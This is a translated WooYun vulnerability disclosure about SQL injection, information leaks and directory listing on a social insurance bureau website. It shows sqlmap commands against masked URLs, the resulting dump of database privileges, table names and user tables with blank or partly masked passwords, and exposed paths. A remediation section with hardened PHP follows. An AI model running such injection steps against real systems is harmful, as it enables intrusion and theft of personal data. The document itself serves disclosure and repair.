
Vulnerability summary

Defect ID: wooyun-2015-0136985

Title: SQL injection (administrator privilege) + information disclosure + directory traversal at a certain social insurance bureau

Related vendor: CNCERT (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-08-28 08:56

Fixed: 2015-10-12 15:58

Published: 2015-10-12 15:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-28: Details sent to the vendor, awaiting vendor handling
2015-08-28: CNCERT (National Internet Emergency Center) could not yet reach the affected unit; details disclosed only to the reporting organisation
2015-09-07: Details disclosed to core white hats and domain experts
2015-09-17: Details disclosed to regular white hats
2015-09-27: Details disclosed to intern white hats
2015-10-12: Details disclosed to the public

Brief description:

Because input is not filtered strictly, the site is vulnerable to SQL injection and the database can be dumped. There is also information disclosure and file traversal.

Detailed description:

First injection point:
c:\Python27\sqlmap>python sqlmap.py -u "**.**.**.**/xwzx_xx.php?id=1285"

[Screenshot 1.png]

[Screenshot 2.png]

[Screenshot 3.png]


database management system users privileges:
[*] ''@'linux' [1]:
privilege: USAGE
[*] ''@'localhost' [1]:
privilege: USAGE
[*] 'pma'@'localhost' [1]:
privilege: USAGE
[*] 'root'@'linux' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'localhost' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'sbj'@'%' (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[11:08:41] [INFO] fetching tables for databases:
, hg, information_schema, mysql, mysql1, mysql2,
renyuan, sbj, shebaoju, test, webauth'
[11:08:41] [INFO] the SQL query used returns 368
Database: cdcol
[1 table]
+----------------------------------------------+
| cds |
+----------------------------------------------+
Database: mysql1
[24 tables]
+----------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: mysql2
[24 tables]
+----------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: hainanshebao2014
[55 tables]
+----------------------------------------------+
| modeltregab01_old_10-10 |
| modeltregac01_old_10-10 |
| aa10 |
| ab01 |
| ab02 |
| ab16 |
| article |
| article_class |
| banner |
| banner_class |
| bingzhong |
| canbao |
| cbab01 |
| cnit_admin |
| cnit_links |
| cnit_mibao |
| cnit_question |
| cnit_website |
| danwei |
| down_class |
| downxx |
| dtproperties |
| jigou |
| jingban |
| ka02 |
| ka03 |
| ka06 |
| lingdao |
| message |
| message_yjx |
| modeltarticle |
| modeltbasecode |
| modeltinterlinkage |
| modeltmessageboard |
| modeltoperatelog |
| modeltoperators |
| modeltregab01 |
| modeltregac01 |
| modeltregac01_old |
| news |
| news_big |
| news_small |
| products |
| products_class |
| qikan |
| qikanclass |
| quanxian |
| role |
| role_quanxian |
| sb_dcsj |
| shipin |
| yaodian |
| yaopin |
| yiyuan |
| zhenliao |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+
Database: phpmyadmin
[12 tables]
+----------------------------------------------+
| pma_bookmark |
| pma_column_info |
| pma_designer_coords |
| pma_history |
| pma_pdf_pages |
| pma_recent |
| pma_relation |
| pma_table_coords |
| pma_table_info |
| pma_table_uiprefs |
| pma_tracking |
| pma_userconfig |
+----------------------------------------------+
Database: shebaoju
[63 tables]
+----------------------------------------------+
| -- |
| aa10 |
| ab01 |
| ab02 |
| ab16 |
| ac01 |
| ac02 |
| ac04 |
| article |
| article_class |
| banner |
| banner_class |
| bingzhong |
| canbao |
| cbab01 |
| cnit_admin |
| cnit_links |
| cnit_mibao |
| cnit_question |
| cnit_website |
| danwei |
| down_class |
| downxx |
| dtproperties |
| ic02 |
| ic14 |
| ic17 |
| ic43 |
| ic50 |
| jigou |
| jingban |
| ka02 |
| ka03 |
| ka06 |
| kc04 |
| kc17 |
| kc24 |
| kc50 |
| lc17 |
| lingdao |
| message |
| modeltarticle |
| modeltbasecode |
| modeltinterlinkage |
| modeltmessageboard |
| modeltoperatelog |
| modeltoperators |
| modeltregab01 |
| modeltregac01 |
| news |
| news_big |
| news_small |
| products |
| products_class |
| qikan |
| quanxian |
| role |
| role_quanxian |
| shipin |
| yaodian |
| yaopin |
| yiyuan |
| zhenliao |
+----------------------------------------------+
Database: renyuan
[1 table]
+----------------------------------------------+
| modeltregac01 |
+----------------------------------------------+
Database: webauth
[1 table]
+----------------------------------------------+
| user_pwd |
+----------------------------------------------+
Database: information_schema
[40 tables]
+----------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: sbj
[2 tables]
+----------------------------------------------+
| ac01 |
| ac01_copy |
+----------------------------------------------+
Database: hg
[48 tables]
+----------------------------------------------+
| 123 |
| aa10 |
| ab01 |
| ab02 |
| ac01 |
| ac02 |
| ac04 |
| article |
| article_class |
| banner |
| banner_class |
| bingzhong |
| canbao |
| cnit_admin |
| cnit_links |
| cnit_website |
| danwei |
| down_class |
| downxx |
| ic02 |
| ic14 |
| ic17 |
| ic43 |
| ic50 |
| jigou |
| jingban |
| kc04 |
| kc17 |
| kc24 |
| kc50 |
| lc17 |
| lingdao |
| message |
| modeltregab01 |
| modeltregac01 |
| news |
| news_big |
| news_small |
| products |
| products_class |
| qikan |
| qikanclass |
| shipin |
| test |
| yaodian |
| yaopin |
| yiyuan |
| zhenliao |
+----------------------------------------------+
Database: ghfhj
[56 tables]
+----------------------------------------------+
| aa10 |
| ab01 |
| ab02 |
| ac01 |
| ac02 |
| ac04 |
| article |
| article_class |
| banner |
| banner_class |
| bingzhong |
| canbao |
| cbab01 |
| cnit_admin |
| cnit_links |
| cnit_website |
| danwei |
| down_class |
| downxx |
| dtproperties |
| ic02 |
| ic14 |
| ic17 |
| ic43 |
| ic50 |
| jigou |
| jingban |
| ka02 |
| ka03 |
| ka06 |
| kc04 |
| kc17 |
| kc24 |
| kc50 |
| lc17 |
| lingdao |
| message |
| modeltarticle |
| modeltbasecode |
| modeltinterlinkage |
| modeltmessageboard |
| modeltoperatelog |
| modeltoperators |
| modeltregab01 |
| modeltregac01 |
| news_big |
| news_small |
| products |
| products_class |
| qikan |
| qikanclass |
| shipin |
| yaodian |
| yaopin |
| yiyuan |
| zhenliao |
+----------------------------------------------+

[Screenshot 4.png]

[Screenshot 5.png]


Database: mysql
Table: user
[6 entries]
+-----------+---------+----------------------------------------------------+
| Host | User | Password |
+-----------+---------+----------------------------------------------------+
| localhost | root | <blank> |
| linux | root | <blank> |
| localhost | <blank> | <blank> |
| linux | <blank> | <blank> |
| localhost | pma | <blank> |
| % | sbj | *6BB4837EB743***05EE4568DDA7********************** |
+-----------+---------+----------------------------------------------------+

[Screenshot 6.png]


Database: mysql2
Table: user
[3 entries]
+-----------------+---------+----------------------------------+
| Host | User | Password |
+-----------------+---------+----------------------------------+
| localhost | root | b876f0ae586e****6923a61542366a1 |
| server-cbd33c70 | root | <blank> |
| localhost | <blank> | <blank> |
+-----------------+---------+----------------------------------+
Database: webauth
Table: user_pwd
[1 entry]
+-------+-------+
| name | pass |
+-------+-------+
| xampp | ******|
+-------+-------+
Second injection point:
c:\Python27\sqlmap>python sqlmap.py -u "http://**.**.**.**/xwzx.php?classid=1"

[Screenshot 13.png]

Information disclosure + file traversal:

[Screenshot 7.png]

phpinfo configuration information disclosure
http://**.**.**.**/phpinfo.php
http://**.**.**.**/test.php

[Screenshot 8.png]


http://**.**.**.**/aa.php

[Screenshot 9.png]


http://**.**.**.**/upload/

[Screenshot 10.png]


http://**.**.**.**/public/

[Screenshot 11.jpg]


http://**.**.**.**/Client.php

[Screenshot 12.png]


Proof of vulnerability:

See above.

Fix recommendation:

Filter input strictly and restrict directory access permissions.

Copyright notice: when reproducing, credit the source: 路人甲@WooYun
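The brief description attributes the injection to loose filtering of the id parameter, and the fix recommendation asks for strict filtering; the durable fix is a typed, parameterized query run as a least-privilege database account rather than as the root or "(administrator)" users shown in the dump. The PHP below is an added example, not the affected site's code (the report does not show its source): the database shebaoju and table news come from the sqlmap output above, while the column names, the web_readonly account and the commented vulnerable pattern are assumptions.

```php
<?php
// Added example, not the site's own xwzx_xx.php. The report only shows the
// URL "xwzx_xx.php?id=1285", so the vulnerable pattern below is an assumption
// about how the raw parameter reached the query.

// --- Vulnerable pattern (assumed): the GET value is concatenated into SQL,
//     so whatever follows the number is parsed as part of the statement.
// $sql = "SELECT title, body FROM news WHERE id=" . $_GET['id'];
// $row = mysqli_fetch_assoc(mysqli_query($db, $sql));

// --- Hardened handler: validate the type, bind the value, fail closed.
function fetchArticle(PDO $db, string $rawId): ?array
{
    // An article id is a positive integer; reject anything else outright
    // instead of trying to strip "dangerous" characters from a string.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // Server-side prepared statement: the value travels separately from the
    // query text, so it can never change the statement's structure.
    $stmt = $db->prepare('SELECT title, body FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Least privilege: connect as a dedicated account holding only SELECT on the
// application schema, e.g. GRANT SELECT ON shebaoju.* TO 'web_readonly'@'localhost',
// not as root (blank password in the dump) or an account with FILE/SUPER.
// 'web_readonly' and the DB_PASSWORD environment variable are placeholders.
$db = new PDO(
    'mysql:host=localhost;dbname=shebaoju;charset=utf8mb4',
    'web_readonly',
    getenv('DB_PASSWORD') ?: '',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real prepares, not client-side quoting
    ]
);

$article = fetchArticle($db, $_GET['id'] ?? '');
if ($article === null) {
    http_response_code(404);
    exit('Not found');
}
// Output encoding keeps a stored value from being rendered as markup.
echo htmlspecialchars($article['title'], ENT_QUOTES, 'UTF-8');
```

The directory-listing part of the recommendation is a web-server setting, not application code: with Apache, `Options -Indexes` for the document root stops /upload/ and /public/ from rendering as listings, and phpinfo.php, test.php and similar leftover scripts should simply be deleted from production.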


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-08-28 15:56

Vendor reply:

CNVD confirms the reported situation; it has been forwarded by CNCERT to the Hainan branch center, which will coordinate further handling with the website's operating unit.

Latest status:

None yet